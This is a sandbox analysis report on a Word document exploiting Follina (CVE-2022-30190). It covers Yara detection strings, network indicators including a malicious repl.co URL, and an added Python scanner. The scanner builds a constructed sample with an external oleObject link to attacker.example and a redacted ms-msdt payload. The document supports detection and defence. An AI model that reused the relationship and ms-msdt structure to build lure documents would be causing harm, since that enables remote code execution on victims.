Windows Analysis Report
C1ZGt61uGv

Overview

General Information

Sample Name: C1ZGt61uGv (renamed file extension from none to docx)
Analysis ID: 686026
MD5: 98998af843c2c938c079a102abe6c73d
SHA1: b1a1dda90b3df0ba5f23430a6c55c48a9c3dbe9d
SHA256: b0cfd511498cbaed084fa622cfeb1a07de7478205cbff58cb40cb89091813593

Detection

Follina CVE-2022-30190
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Malicious sample detected (through community Yara rule)
Antivirus detection for dropped file
Snort IDS alert for network traffic
Contains an external reference to another file
Detected suspicious Microsoft Office reference URL
Yara signature match
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2960 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • cleanup
No configs have been found
Yara Overview

Initial Sample

Source: document.xml.rels
Rule: SUSP_Doc_WordXMLRels_May22
Description: Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation
Author: Tobias Michalski, Christian Burkard, Wojciech Cieslak
Strings:
  • 0x39:$a1: <Relationships
  • 0x3d2:$a2: TargetMode="External"
  • 0x3ca:$x1: .html!

Source: document.xml.rels
Rule: INDICATOR_OLE_RemoteTemplate
Description: Detects XML relations where an OLE object is referencing an external target in dropper OOXML documents
Author: ditekSHen
Strings:
  • 0x375:$olerel: relationships/oleObject
  • 0x38e:$target1: Target="http
  • 0x3d2:$mode: TargetMode="External

PCAP (Network Traffic)

Source: sslproxydump.pcap
Rule: SUSP_PS1_Msdt_Execution_May22
Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation
Author: Nasreddine Bencherchali, Christian Burkard
Strings:
  • 0x2d0d:$a: PCWDiagnostic
  • 0x6177:$a: PCWDiagnostic
  • 0x2d01:$sa3: ms-msdt
  • 0x616b:$sa3: ms-msdt
  • 0x2d61:$sb3: IT_BrowseForFile=
  • 0x61cb:$sb3: IT_BrowseForFile=

Source: sslproxydump.pcap
Rule: JoeSecurity_Follina
Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190
Author: Joe Security

Dropped Files

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\index[1].htm
Rule: SUSP_PS1_Msdt_Execution_May22
Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation
Author: Nasreddine Bencherchali, Christian Burkard
Strings:
  • 0x1444:$a: PCWDiagnostic
  • 0x1438:$sa3: ms-msdt
  • 0x1498:$sb3: IT_BrowseForFile=

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\index[1].htm
Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22
Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation
Author: Tobias Michalski, Christian Burkard
Strings:
  • 0x1427:$re1: location.href = "ms-msdt:

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\index[1].htm
Rule: SUSP_PS1_Msdt_Execution_May22
Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation
Author: Nasreddine Bencherchali, Christian Burkard
Strings:
  • 0x1444:$a: PCWDiagnostic
  • 0x1438:$sa3: ms-msdt
  • 0x1498:$sb3: IT_BrowseForFile=

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\index[1].htm
Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22
Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation
Author: Tobias Michalski, Christian Burkard
Strings:
  • 0x1427:$re1: location.href = "ms-msdt:

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\index[1].htm
Rule: JoeSecurity_Follina
Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190
Author: Joe Security
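The rule matches above key on two artifacts: an external oleObject relationship in word/_rels/document.xml.rels whose target ends in ".html!", and an "ms-msdt:" URI carrying PCWDiagnostic and IT_BrowseForFile= in the page that relationship fetches. The Python below is an added example, not part of the Joe Sandbox report and not the Yara authors' code. It builds a constructed minimal .docx in memory with such a relationship, lists every external relationship in the package, flags the Follina shape, and runs the same three string checks over a constructed HTML fragment. The host name attacker.example, the function names and the redacted msdt parameter are assumptions; nothing is fetched from the network.

```python
import io
import re
import sys
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_TAG = "{%s}Relationship" % RELS_NS

# Constructed sample (not from the analysed document): a document.xml.rels with an
# external oleObject relationship whose target ends in ".html!". The host name is a
# placeholder, not the domain seen in the report.
SAMPLE_RELS = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="https://attacker.example/index.html!" TargetMode="External"/>
</Relationships>
"""

# Constructed sample of the page such a relationship fetches. The msdt argument is
# stubbed out; only the strings the report's rules key on are present.
SAMPLE_HTML = (
    "<!doctype html><html><body><script>\n"
    'window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param '
    '\\"IT_BrowseForFile=<redacted>\\"";\n'
    "</script></body></html>\n"
)


def build_sample_docx() -> bytes:
    """Pack SAMPLE_RELS into a minimal in-memory .docx (an OOXML zip)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<document/>")
        z.writestr("word/_rels/document.xml.rels", SAMPLE_RELS)
    return buf.getvalue()


def external_relationships(docx_bytes: bytes):
    """Every TargetMode="External" relationship in any .rels part: (part, id, type, target)."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            for rel in ET.fromstring(z.read(name)).iter(REL_TAG):
                if rel.get("TargetMode", "Internal") == "External":
                    found.append((name, rel.get("Id"), rel.get("Type", ""), rel.get("Target", "")))
    return found


def follina_rels_indicators(docx_bytes: bytes):
    """Flag external relationships with the Follina delivery shape: an oleObject
    relationship fetched over http(s), and/or a target ending in ".html!" (the
    trailing "!" is what SUSP_Doc_WordXMLRels_May22's $x1 string matches)."""
    hits = []
    for part, rid, rtype, target in external_relationships(docx_bytes):
        reasons = []
        if rtype.endswith("/oleObject") and target.lower().startswith("http"):
            reasons.append("external oleObject over http(s)")
        if target.endswith(".html!"):
            reasons.append("target ends in .html!")
        if reasons:
            hits.append({"part": part, "id": rid, "target": target, "reasons": reasons})
    return hits


# The same three strings the msdt rules in the report match on.
MSDT_PATTERNS = {
    "location.href set to an ms-msdt: URI": re.compile(r'location\.href\s*=\s*["\']ms-msdt:', re.I),
    "PCWDiagnostic troubleshooter id": re.compile(r"PCWDiagnostic"),
    "IT_BrowseForFile parameter": re.compile(r"IT_BrowseForFile="),
}


def msdt_indicators(html: str):
    """Names of the msdt indicators present in an HTML body (all three = Follina payload)."""
    return [label for label, rx in MSDT_PATTERNS.items() if rx.search(html)]


if __name__ == "__main__":
    # Pass a .docx path to scan a real file; with no argument the constructed sample is used.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_docx()
    for hit in follina_rels_indicators(data):
        print(f"{hit['part']} {hit['id']}: {hit['target']} -> {', '.join(hit['reasons'])}")
    print("msdt indicators in sample HTML:", msdt_indicators(SAMPLE_HTML))
```

An external relationship is not evidence on its own: attachedTemplate and hyperlink relationships with TargetMode="External" are common in legitimate documents, which is why the script reports the oleObject-over-http(s) reason and the ".html!" reason separately rather than as one verdict. Scanning the document only finds the lure; on an unpatched host it is the ms-msdt: protocol handler that turns the fetched page into code execution, which is why Microsoft's interim workaround for CVE-2022-30190 was to unregister that handler.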
      No Sigma rule has matched

Snort IDS alerts

Timestamp: 08/18/22-04:23:24.931708
SID: 2025010
Source IP: 35.186.245.55
Destination IP: 192.168.2.22
Source Port: 443
Destination Port: 49176
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 08/18/22-04:23:28.806682
SID: 2025010
Source IP: 35.186.245.55
Destination IP: 192.168.2.22
Source Port: 443
Destination Port: 49181
Protocol: TCP
Classtype: A Network Trojan was detected

      AV Detection

Source: C1ZGt61uGv.docx | Avira: detected
Source: C1ZGt61uGv.docx | Virustotal: Detection: 45%
Source: C1ZGt61uGv.docx | Metadefender: Detection: 25%
Source: C1ZGt61uGv.docx | ReversingLabs: Detection: 35%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\535F33EE.htm | Avira: detection malicious, Label: JS/CVE-2022-30190.G
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\index[1].htm | Avira: detection malicious, Label: JS/CVE-2022-30190.G
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\index[1].htm | Avira: detection malicious, Label: JS/CVE-2022-30190.G
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FEAC362C.htm | Avira: detection malicious, Label: JS/CVE-2022-30190.G

      Exploits

Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\index[1].htm, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\index[1].htm, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\535F33EE.htm, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FEAC362C.htm, type: DROPPED
Source: document.xml.rels | Extracted files from sample: https://dullghostwhitetwintext.karewen.repl.co/index.html!
Source: unknown | HTTPS traffic detected: 34.149.204.188:443 -> 192.168.2.22:49174 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 34.149.204.188:443 -> 192.168.2.22:49175 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 34.149.204.188:443 -> 192.168.2.22:49180 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown | HTTPS traffic detected: 35.186.245.55:443 -> 192.168.2.22:49173 version: TLS 1.2
Source: global traffic | TCP traffic, packets per flow (client 192.168.2.22):

Client port   Server                 -> server   <- server
49173         35.186.245.55:443      12          9
49174         34.149.204.188:443     8           10
49175         34.149.204.188:443     8           9
49176         35.186.245.55:443      12          12
49177         35.186.245.55:443      11          8
49178         35.186.245.55:443      12          9
49179         35.186.245.55:443      11          8
49180         34.149.204.188:443     9           10
49181         35.186.245.55:443      13          12
49182         35.186.245.55:443      10          8
49183         35.186.245.55:443      11          8
Source: global traffic | DNS query: name: dullghostwhitetwintext.karewen.repl.co (7 queries)
Source: global traffic | TCP traffic, outbound packets per flow (client 192.168.2.22):

Client port   Server                 -> server
49173         35.186.245.55:443      12
49174         34.149.204.188:443     8
49175         34.149.204.188:443     8
49176         35.186.245.55:443      12
49177         35.186.245.55:443      11
49178         35.186.245.55:443      12
49179         35.186.245.55:443      11
49180         34.149.204.188:443     9
49181         35.186.245.55:443      13
49182         35.186.245.55:443      7 (listing truncated)
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 35.186.245.55:443

      Networking

      barindex
      Source: Traffic | Snort IDS: 2025010 ET TROJAN Powershell commands sent B64 1 35.186.245.55:443 -> 192.168.2.22:49176
      Source: Traffic | Snort IDS: 2025010 ET TROJAN Powershell commands sent B64 1 35.186.245.55:443 -> 192.168.2.22:49181
      Source: global traffic | HTTP traffic detected:
          GET /index.html HTTP/1.1
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
          UA-CPU: AMD64
          Accept-Encoding: gzip, deflate
          Host: dullghostwhitetwintext.karewen.repl.co
          Connection: Keep-Alive
      Source: Joe Sandbox View | JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
      Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
      Source: unknown | HTTPS traffic detected: 34.149.204.188:443 -> 192.168.2.22:49174 version: TLS 1.0
      Source: unknown | HTTPS traffic detected: 34.149.204.188:443 -> 192.168.2.22:49175 version: TLS 1.0
      Source: unknown | HTTPS traffic detected: 34.149.204.188:443 -> 192.168.2.22:49180 version: TLS 1.0
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49179
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49178
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49177
      Source: unknown | Network traffic detected: HTTP traffic on port 49180 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49183 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49176
      Source: unknown | Network traffic detected: HTTP traffic on port 49181 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49182 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49175
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49174
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49173
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49183
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49182
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49181
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49180
      Source: unknown | Network traffic detected: HTTP traffic on port 49175 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49176 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49173 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49174 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49177 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49178 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49179 -> 443
      Source: global traffic | HTTP traffic detected:
          HTTP/1.1 404 Not Found
          Content-Length: 207
          Content-Type: text/html; charset=utf-8
          Date: Thu, 18 Aug 2022 02:23:07 GMT
          Expect-Ct: max-age=2592000, report-uri="https://sentry.repl.it/api/10/security/?sentry_key=615192fd532445bfbbbe966cd7131791"
          Replit-Cluster: global
          Server: Werkzeug/2.1.2 Python/3.8.12
          Strict-Transport-Security: max-age=7758095; includeSubDomains
          Connection: close
      Source: global traffic | HTTP traffic detected:
          HTTP/1.1 404 Not Found
          Content-Length: 207
          Content-Type: text/html; charset=utf-8
          Date: Thu, 18 Aug 2022 02:23:24 GMT
          Expect-Ct: max-age=2592000, report-uri="https://sentry.repl.it/api/10/security/?sentry_key=615192fd532445bfbbbe966cd7131791"
          Replit-Cluster: global
          Server: Werkzeug/2.1.2 Python/3.8.12
          Strict-Transport-Security: max-age=7758077; includeSubDomains
          Connection: close
      Source: global traffic | HTTP traffic detected:
          HTTP/1.1 404 Not Found
          Content-Length: 207
          Content-Type: text/html; charset=utf-8
          Date: Thu, 18 Aug 2022 02:23:27 GMT
          Expect-Ct: max-age=2592000, report-uri="https://sentry.repl.it/api/10/security/?sentry_key=615192fd532445bfbbbe966cd7131791"
          Replit-Cluster: global
          Server: Werkzeug/2.1.2 Python/3.8.12
          Strict-Transport-Security: max-age=7758074; includeSubDomains
          Connection: close
      Source: ~WRF{4AF4D387-AD82-4BF6-994E-7F9F57B3DDFD}.tmp.0.dr, ~WRS{D894BCB6-25AA-45DC-81E3-B0273BF56D57}.tmp.0.dr | String found in binary or memory: https://dullghostwhitetwintext.karewen.repl.co/index.html
      Source: ~WRF{4AF4D387-AD82-4BF6-994E-7F9F57B3DDFD}.tmp.0.dr | String found in binary or memory: https://dullghostwhitetwintext.karewen.repl.co/index.htmlyX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{92861601-980D-49B7-B60E-86BDABC4A51A}.tmp
      Source: unknown | DNS traffic detected: queries for: dullghostwhitetwintext.karewen.repl.co
      Source: unknown | HTTPS traffic detected: 35.186.245.55:443 -> 192.168.2.22:49173 version: TLS 1.2

      System Summary

      barindex
      Source: document.xml.rels, type: SAMPLE | Matched rule: Detects XML relations where an OLE object is referencing an external target in dropper OOXML documents Author: ditekSHen
      Source: sslproxydump.pcap, type: PCAP | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: document.xml.rels, type: SAMPLE | Matched rule: SUSP_Doc_WordXMLRels_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, Wojciech Cieslak, description = Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-06-20, hash = 62f262d180a5a48f89be19369a8425bec596bc6a02ed23100424930791ae3df0
      Source: document.xml.rels, type: SAMPLE | Matched rule: INDICATOR_OLE_RemoteTemplate author = ditekSHen, description = Detects XML relations where an OLE object is referencing an external target in dropper OOXML documents
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\index[1].htm, type: DROPPED | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\index[1].htm, type: DROPPED | Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\535F33EE.htm, type: DROPPED | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\535F33EE.htm, type: DROPPED | Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FEAC362C.htm, type: DROPPED | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FEAC362C.htm, type: DROPPED | Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
      Source: ~WRF{4AF4D387-AD82-4BF6-994E-7F9F57B3DDFD}.tmp.0.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
      Source: C1ZGt61uGv.docx | Virustotal: Detection: 45%
      Source: C1ZGt61uGv.docx | Metadefender: Detection: 25%
      Source: C1ZGt61uGv.docx | ReversingLabs: Detection: 35%
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
      Source: C1ZGt61uGv.LNK.0.dr | LNK file: ..\..\..\..\..\Desktop\C1ZGt61uGv.docx
      Source: C1ZGt61uGv.docx | OLE indicator, Word Document stream: true
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$ZGt61uGv.docx
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR6279.tmp
      Source: classification engine | Classification label: mal96.expl.evad.winDOCX@1/20@7/2
      Source: C1ZGt61uGv.docx | OLE document summary: title field not present or empty
      Source: C1ZGt61uGv.docx | OLE document summary: edited time not present or 0
      Source: ~WRF{4AF4D387-AD82-4BF6-994E-7F9F57B3DDFD}.tmp.0.dr | OLE document summary: title field not present or empty
      Source: ~WRF{4AF4D387-AD82-4BF6-994E-7F9F57B3DDFD}.tmp.0.dr | OLE document summary: author field not present or empty
      Source: ~WRF{4AF4D387-AD82-4BF6-994E-7F9F57B3DDFD}.tmp.0.dr | OLE document summary: edited time not present or 0
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
      Source: Window Recorder | Window detected: More than 3 window changes detected
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: C1ZGt61uGv.docx | Initial sample: OLE indicators vbamacros = False

      Persistence and Installation Behavior

      barindex
      Source: document.xml.rels | Extracted files from sample: https://dullghostwhitetwintext.karewen.repl.co/index.html!
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
      MITRE ATT&CK Matrix (techniques listed per tactic; numbers in parentheses are the report's per-technique match counts)
      Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts
      Execution: Exploitation for Client Execution (13); Scheduled Task/Job; At (Linux); At (Windows)
      Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac)
      Privilege Escalation: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac)
      Defense Evasion: Masquerading (1); Rootkit; Obfuscated Files or Information; Binary Padding
      Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS
      Discovery: File and Directory Discovery (1); System Information Discovery (2); Query Registry; System Network Configuration Discovery
      Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model
      Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture
      Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer
      Command and Control: Encrypted Channel (1); Non-Application Layer Protocol (3); Application Layer Protocol (14); Ingress Tool Transfer (4)
      Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap
      Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud
      Impact: Modify System Partition; Device Lockout; Delete Device Data
      Source | Detection | Scanner | Label
      C1ZGt61uGv.docx | 46% | Virustotal |
      C1ZGt61uGv.docx | 26% | Metadefender |
      C1ZGt61uGv.docx | 35% | ReversingLabs | Document-Word.Trojan.Minerva
      C1ZGt61uGv.docx | 100% | Avira | W97M/Dldr.Agent.G1
      Source | Detection | Scanner | Label
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\535F33EE.htm | 100% | Avira | JS/CVE-2022-30190.G
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\index[1].htm | 100% | Avira | JS/CVE-2022-30190.G
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FEAC362C.htm | 100% | Avira | JS/CVE-2022-30190.G
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      dullghostwhitetwintext.karewen.repl.co | 35.186.245.55 | true | false | | high
      Name | Malicious | Antivirus Detection | Reputation
      https://dullghostwhitetwintext.karewen.repl.co/index.html | false | | high
      Name | Source | Malicious | Antivirus Detection | Reputation
      https://dullghostwhitetwintext.karewen.repl.co/index.htmlyX | ~WRF{4AF4D387-AD82-4BF6-994E-7F9F57B3DDFD}.tmp.0.dr | false | | high
      IP | Domain | Country | ASN | ASN Name | Malicious
      35.186.245.55 | dullghostwhitetwintext.karewen.repl.co | United States | 15169 | GOOGLEUS | false
      34.149.204.188 | unknown | United States | 2686 | ATGS-MMD-ASUS | false
            Joe Sandbox Version:35.0.0 Citrine
            Analysis ID:686026
            Start date and time:2022-08-18 04:22:09 +02:00
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 5m 9s
            Hypervisor based Inspection enabled:false
            Report type:light
            Sample file name:C1ZGt61uGv (renamed file extension from none to docx)
            Cookbook file name:defaultwindowsofficecookbook.jbs
            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
            Number of analysed new started processes analysed:6
            Number of new started drivers analysed:1
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal96.expl.evad.winDOCX@1/20@7/2
            EGA Information:Failed
            HDC Information:Failed
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 0
            • Number of non-executed functions: 0
            Cookbook Comments:
            • Adjust boot time
